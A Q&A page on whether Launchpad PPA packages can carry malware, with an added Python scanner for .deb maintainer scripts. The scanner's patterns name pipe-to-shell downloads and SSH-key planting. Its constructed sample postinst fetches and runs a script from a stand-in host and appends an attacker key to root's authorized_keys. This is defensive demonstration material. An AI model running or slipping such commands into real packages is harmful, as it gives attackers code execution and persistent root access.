Is there any guarantee that software from Launchpad PPAs is free from viruses and backdoor threats?

Solution 1:

Every package's install script has root access to your system, so the mere act of adding a PPA or installing a package from one is an implicit statement of trust on your part of the PPA owner.

So, what happens if your trust is misplaced and a PPA owner wants to be naughty?

In order to upload to a PPA, a package must be signed by a GPG key unique to the launchpad user (indeed, the same key they signed the code of conduct with). So in the case of a known malicious PPA we would simply ban the account and shut down the PPA (affected systems would still be compromised, but there's no good way to fix them at that point anyway).

To some extent Launchpad's social features can be used as a bit of a preventative measure against bad users -- someone who has a history of contributing to Ubuntu and some established Launchpad karma, for instance, is less likely to be setting up a trap PPA.

Or what if someone gains control of a PPA that isn't theirs?

Well, this is a bit tougher of a threat scenario, but also less likely since it requires an attacker getting both the Launchpad user's private key file (generally only on their computer) as well as the unlock code for it (generally a strong password not used for anything else). If this happens, though, it's usually fairly simple for someone to figure out their account has been compromised (Launchpad will for instance email them about the packages they're not uploading), and the cleanup procedure would be the same.

So, in sum, PPAs are a possible vector for malicious software, but there are probably much easier methods for attackers to come after you.
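The answer above rests on one fact: a package's maintainer scripts run as root, so the practical check before trusting a PPA is to read those scripts. The following is an added example for this page, not Launchpad's or dpkg's own tooling: it parses a .deb offline (an `ar` archive holding `debian-binary`, `control.tar.*` and `data.tar.*`), pulls out `preinst`/`postinst`/`prerm`/`postrm` from the control tarball, and flags lines a reviewer would want to read. The sample package, the `example.invalid` URL and the pattern list are constructed for the demonstration and are not from any real PPA.

```python
"""Inspect the maintainer scripts of a .deb before installing it (added example)."""
import io
import re
import tarfile

MAINTAINER_SCRIPTS = {"preinst", "postinst", "prerm", "postrm"}
# Constructed, deliberately small list of patterns worth a human's eyes; not exhaustive.
SUSPICIOUS = [
    re.compile(r"curl\s.*\|\s*(ba)?sh"),      # pipe-to-shell download
    re.compile(r"wget\s.*\|\s*(ba)?sh"),
    re.compile(r"/etc/sudoers"),              # privilege persistence
    re.compile(r"authorized_keys"),           # SSH key planting
    re.compile(r"\bbase64\b.*\|"),            # obfuscated payload
]


def ar_members(blob: bytes):
    """Yield (name, data) for each member of an `ar` archive, the .deb container."""
    if blob[:8] != b"!<arch>\n":
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        if hdr[58:60] != b"`\n":
            raise ValueError("corrupt ar header")
        # GNU ar terminates names with '/', BSD/dpkg-deb pads with spaces; accept both.
        name = hdr[0:16].decode("ascii").rstrip().rstrip("/")
        size = int(hdr[48:58].decode("ascii").strip())
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size & 1)  # members are padded to an even offset


def maintainer_scripts(deb: bytes) -> dict:
    """Return {script_name: text} for every maintainer script in the control tarball."""
    scripts = {}
    for name, data in ar_members(deb):
        if not name.startswith("control.tar"):
            continue
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for m in tf.getmembers():
                base = m.name.lstrip("./")
                if m.isfile() and base in MAINTAINER_SCRIPTS:
                    scripts[base] = tf.extractfile(m).read().decode("utf-8", "replace")
    return scripts


def review(deb: bytes) -> dict:
    """Map each maintainer script to the list of lines matching a suspicious pattern."""
    return {
        name: [ln for ln in text.splitlines() if any(p.search(ln) for p in SUSPICIOUS)]
        for name, text in maintainer_scripts(deb).items()
    }


# --- constructed sample package, so the example runs offline ---------------------
def _ar_member(name: str, data: bytes) -> bytes:
    hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{0o100644:<8o}{len(data):<10}`\n".encode()
    return hdr + data + (b"\n" if len(data) % 2 else b"")


def _tar_gz(files: dict) -> bytes:
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in files.items():
            info = tarfile.TarInfo("./" + name)
            info.size, info.mode = len(content), 0o755
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


def build_sample_deb() -> bytes:
    """Constructed .deb (hypothetical 'example' package) whose postinst misbehaves."""
    control = b"Package: example\nVersion: 1.0\nArchitecture: all\nMaintainer: x\nDescription: sample\n"
    postinst = (b"#!/bin/sh\nset -e\n"
                b"curl -s http://example.invalid/setup.sh | sh\n"
                b"echo 'ssh-rsa AAAA... attacker' >> /root/.ssh/authorized_keys\n"
                b"exit 0\n")
    prerm = b"#!/bin/sh\nexit 0\n"
    ctrl = _tar_gz({"control": control, "postinst": postinst, "prerm": prerm})
    data = _tar_gz({"usr/share/doc/example/README": b"hello\n"})
    return (b"!<arch>\n" + _ar_member("debian-binary", b"2.0\n")
            + _ar_member("control.tar.gz", ctrl) + _ar_member("data.tar.gz", data))


if __name__ == "__main__":
    for script, hits in review(build_sample_deb()).items():
        print(script, "->", hits or "nothing flagged")
```

On a real system you would fetch the package without installing it (`apt-get download <pkg>` after adding the PPA) and pass the file to `review()`. The pattern list only surfaces obvious tells; a script that looks clean still runs as root, and the payload in `data.tar.*` (binaries, cron entries, systemd units) is not examined here, so this is a complement to the trust decision the answer describes, not a substitute for it.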

Solution 2:

Establishing a (perhaps distributed) mechanism of trust ratings for PPAs has been on the USC roadmap for a while, but it hasn't been implemented yet.

Solution 3:

There is never any guarantee but in a community backed environment, we thrive on "belief". I've added at least 20 PPAs to my sources and never experienced a problem until now. If, by any chance and as you mentioned, a threat/virus/backdoor is planted on my system by a PPA, I'd come to know about it somehow, courtesy of the community and simply remove it. And BTW, before adding a PPA, I always check what packages are listed in it.

PS: Pidgin never sends usernames and passwords to the servers (and never to a third party!) "secretly". Everything is done with the user's consent. In order to keep you connected seamlessly, Pidgin cannot ping you every time it sends the login credentials to the servers. It is expected that you have authorised it to do so, once you have provided it the details. I'd rather think twice before calling Pidgin a "backdoor". :)